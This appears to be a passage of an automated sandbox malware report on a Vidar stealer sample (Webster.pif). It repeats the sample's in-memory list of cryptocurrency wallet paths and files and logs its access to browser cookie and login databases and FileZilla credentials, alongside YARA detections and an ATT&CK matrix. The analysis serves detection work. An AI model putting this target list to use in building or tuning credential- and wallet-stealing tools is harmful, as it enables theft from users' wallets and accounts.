Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: Webster.pifBinary or memory string: WIN_81
                        Source: Webster.pifBinary or memory string: WIN_XP
                        Source: Webster.pifBinary or memory string: WIN_XPe
                        Source: Webster.pifBinary or memory string: WIN_VISTA
                        Source: Webster.pifBinary or memory string: WIN_7
                        Source: Webster.pifBinary or memory string: WIN_8
                        Source: Cu.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                        Source: Yara matchFile source: 0000000B.00000002.3322725102.000000000495E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Webster.pif PID: 5740, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 11.2.Webster.pif.47f0000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Webster.pif.1b4b810.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Webster.pif.17ad098.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Webster.pif.1b4b810.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Webster.pif.17ad098.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Webster.pif PID: 5740, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AF696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_00AF696E
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AF6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00AF6E32

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure2
                        Valid Accounts                        		11
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        Exploitation for Privilege Escalation                        		11
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		2
                        Ingress Tool Transfer                        		Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Native API                        		2
                        Valid Accounts                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		21
                        Input Capture                        		1
                        Account Discovery                        		Remote Desktop Protocol4
                        Data from Local System                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                        Valid Accounts                        		2
                        Obfuscated Files or Information                        		Security Account Manager3
                        File and Directory Discovery                        		SMB/Windows Admin Shares21
                        Input Capture                        		3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                        Access Token Manipulation                        		1
                        Software Packing                        		NTDS26
                        System Information Discovery                        		Distributed Component Object Model3
                        Clipboard Data                        		114
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                        Process Injection                        		1
                        DLL Side-Loading                        		LSA Secrets51
                        Security Software Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                        Masquerading                        		Cached Domain Credentials1
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                        Valid Accounts                        		DCSync4
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Virtualization/Sandbox Evasion                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                        Access Token Manipulation                        		/etc/passwd and /etc/shadow1
                        System Owner/User Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                        Process Injection                        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
